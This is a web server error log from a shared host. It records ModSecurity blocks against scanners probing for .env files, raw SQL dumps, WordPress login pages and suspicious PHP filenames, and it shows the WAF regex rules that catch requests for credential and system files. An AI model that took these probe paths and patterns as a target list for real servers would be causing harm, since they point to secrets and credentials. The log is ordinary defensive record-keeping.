[Tue May 26 13:17:34.527524 2026] [security2:error] [pid 501489:tid 501672] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/user/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTMwAAALk"]
[Tue May 26 13:17:34.543045 2026] [security2:error] [pid 501489:tid 501682] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/v1/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTNQAAAMM"]
[Tue May 26 13:17:34.568309 2026] [security2:error] [pid 501489:tid 501692] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/v2/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTOAAAAM0"]
[Tue May 26 13:17:34.570309 2026] [security2:error] [pid 501489:tid 501729] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/v3/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTOQAAAPA"]
[Tue May 26 13:17:34.765880 2026] [security2:error] [pid 501489:tid 501744] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/var/www/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTSQAAAP0"]
[Tue May 26 13:17:34.779535 2026] [security2:error] [pid 501489:tid 501713] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/var/www/html/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTSwAAAOI"]
[Tue May 26 13:17:34.835908 2026] [security2:error] [pid 501489:tid 501719] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/web/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTVgAAAOg"]
[Tue May 26 13:17:34.988507 2026] [security2:error] [pid 501489:tid 501675] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/website/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTaAAAALw"]
[Tue May 26 13:17:35.198673 2026] [security2:error] [pid 501489:tid 501619] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/wp-content/mysql.sql"] [unique_id "ahVQF2kFNZ9cRlz80IjTdwAAAIU"]
[Tue May 26 13:17:35.410456 2026] [core:error] [pid 501489:tid 501630] [client 120.76.231.11:53946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:17:35.410475 2026] [core:error] [pid 501489:tid 501630] [client 120.76.231.11:53946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:17:35.857937 2026] [security2:error] [pid 501489:tid 501718] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQF2kFNZ9cRlz80IjThgAAAOc"]
[Tue May 26 13:17:37.608772 2026] [security2:error] [pid 501489:tid 501671] [client 176.65.139.234:42436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "amslca.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTtQAAALg"]
[Tue May 26 13:17:37.610238 2026] [security2:error] [pid 501489:tid 501668] [client 176.65.139.235:33524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dhmwayanad.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTtgAAALU"]
[Tue May 26 13:17:37.717557 2026] [security2:error] [pid 501489:tid 501631] [client 176.65.139.231:27994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.mrgtp.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTtwAAAJE"]
[Tue May 26 13:17:37.730474 2026] [security2:error] [pid 501489:tid 501700] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQGWkFNZ9cRlz80IjTrgAAANU"]
[Tue May 26 13:17:37.759100 2026] [security2:error] [pid 501489:tid 501734] [client 176.65.139.235:33534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.futurance.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTuAAAAPQ"]
[Tue May 26 13:17:38.159598 2026] [security2:error] [pid 501489:tid 501657] [client 176.65.139.235:33546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dglmmm.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGmkFNZ9cRlz80IjTxAAAAKo"]
[Tue May 26 13:17:38.931360 2026] [security2:error] [pid 501489:tid 501630] [client 176.65.139.237:47860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.shirdisaibabatemple.org.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGmkFNZ9cRlz80IjT3wAAAJA"]
[Tue May 26 13:17:39.093302 2026] [security2:error] [pid 501489:tid 501662] [client 4.201.75.230:34701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/bless.php"] [unique_id "ahVQG2kFNZ9cRlz80IjT4gAAAK8"]
[Tue May 26 13:17:40.109190 2026] [security2:error] [pid 501489:tid 501720] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQG2kFNZ9cRlz80IjT9AAAAOk"]
[Tue May 26 13:17:40.730772 2026] [proxy:error] [pid 501489:tid 501516] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:17:40.730813 2026] [proxy_http:error] [pid 501489:tid 501516] [remote 147.185.132.126:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:17:40.731372 2026] [proxy:error] [pid 501489:tid 501516] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:17:40.731402 2026] [proxy_http:error] [pid 501489:tid 501516] [remote 147.185.132.126:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:17:40.833179 2026] [security2:error] [pid 501489:tid 501689] [client 176.65.139.233:34342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mrgtp.in"] [uri "/.env"] [unique_id "ahVQHGkFNZ9cRlz80IjUFQAAAMo"]
[Tue May 26 13:17:41.434242 2026] [security2:error] [pid 501489:tid 501667] [client 176.65.139.237:47876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "amslca.com"] [uri "/.env"] [unique_id "ahVQHWkFNZ9cRlz80IjUKgAAALQ"]
[Tue May 26 13:17:41.489948 2026] [security2:error] [pid 501489:tid 501576] [remote 141.95.202.18:43204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVQHWkFNZ9cRlz80IjUJgAAsFY"]
[Tue May 26 13:17:41.500418 2026] [security2:error] [pid 501489:tid 501668] [client 176.65.139.234:42502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shirdisaibabatemple.org"] [uri "/.env"] [unique_id "ahVQHWkFNZ9cRlz80IjUKwAAALU"]
[Tue May 26 13:17:41.976742 2026] [security2:error] [pid 501489:tid 501642] [client 4.201.75.230:26400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahVQHWkFNZ9cRlz80IjUOQAAAJw"]
[Tue May 26 13:17:42.317547 2026] [security2:error] [pid 501489:tid 501628] [client 176.65.139.233:34356] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dglmmm.org.in"] [uri "/.env"] [unique_id "ahVQHmkFNZ9cRlz80IjUQAAAAI4"]
[Tue May 26 13:17:42.990075 2026] [security2:error] [pid 501489:tid 501705] [client 114.119.130.177:52635] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/apply-now.html"] [unique_id "ahVQHmkFNZ9cRlz80IjUWQAAANo"], referer: http://www.video-bookmark.com/user/toronto121mortgage/1
[Tue May 26 13:17:43.152021 2026] [security2:error] [pid 501489:tid 501710] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQHmkFNZ9cRlz80IjUUQAAAN8"]
[Tue May 26 13:17:44.626217 2026] [security2:error] [pid 501489:tid 501672] [client 4.201.75.230:33874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahVQIGkFNZ9cRlz80IjUnwAAALk"]
[Tue May 26 13:17:44.866990 2026] [security2:error] [pid 501489:tid 501697] [client 142.248.80.176:19786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVQIGkFNZ9cRlz80IjUpAAAANI"]
[Tue May 26 13:17:44.964125 2026] [security2:error] [pid 501489:tid 501731] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQIGkFNZ9cRlz80IjUnAAAAPE"]
[Tue May 26 13:17:45.380393 2026] [security2:error] [pid 501489:tid 501694] [client 142.248.80.176:19836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVQIWkFNZ9cRlz80IjUwgAAAM8"]
[Tue May 26 13:17:45.382738 2026] [security2:error] [pid 501489:tid 501734] [client 142.248.80.176:19822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVQIWkFNZ9cRlz80IjUxQAAAPQ"]
[Tue May 26 13:17:45.383587 2026] [security2:error] [pid 501489:tid 501723] [client 142.248.80.176:19806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVQIWkFNZ9cRlz80IjUvgAAAOs"]
[Tue May 26 13:17:45.532659 2026] [security2:error] [pid 501489:tid 501624] [client 146.174.160.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQIWkFNZ9cRlz80IjUsQAAAIo"]
[Tue May 26 13:17:46.118612 2026] [security2:error] [pid 501489:tid 501727] [client 4.201.75.230:33862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahVQImkFNZ9cRlz80IjU4QAAAO4"]
[Tue May 26 13:17:46.828437 2026] [security2:error] [pid 501489:tid 501570] [remote 172.232.108.36:6024] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahVQImkFNZ9cRlz80IjU9gAAzlA"]
[Tue May 26 13:17:46.879890 2026] [security2:error] [pid 501489:tid 501695] [client 4.201.75.230:33896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/aw.php"] [unique_id "ahVQImkFNZ9cRlz80IjU9wAAANA"]
[Tue May 26 13:17:46.986076 2026] [security2:error] [pid 501489:tid 501649] [client 45.148.10.204:45638] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQImkFNZ9cRlz80IjVAAAAAKI"]
[Tue May 26 13:17:46.995251 2026] [security2:error] [pid 501489:tid 501728] [client 45.148.10.204:45640] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQImkFNZ9cRlz80IjVAgAAAO8"]
[Tue May 26 13:17:47.022029 2026] [security2:error] [pid 501489:tid 501626] [client 45.148.10.204:45656] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBAAAAIw"]
[Tue May 26 13:17:47.026440 2026] [security2:error] [pid 501489:tid 501690] [client 45.148.10.204:45660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBQAAAMs"]
[Tue May 26 13:17:47.132484 2026] [security2:error] [pid 501489:tid 501625] [client 45.148.10.204:45684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBgAAAIs"]
[Tue May 26 13:17:47.143983 2026] [security2:error] [pid 501489:tid 501633] [client 45.148.10.204:45674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBwAAAJM"]
[Tue May 26 13:17:47.154187 2026] [security2:error] [pid 501489:tid 501708] [client 45.148.10.204:45680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCAAAAN0"]
[Tue May 26 13:17:47.160936 2026] [security2:error] [pid 501489:tid 501621] [client 45.148.10.204:45716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCQAAAIc"]
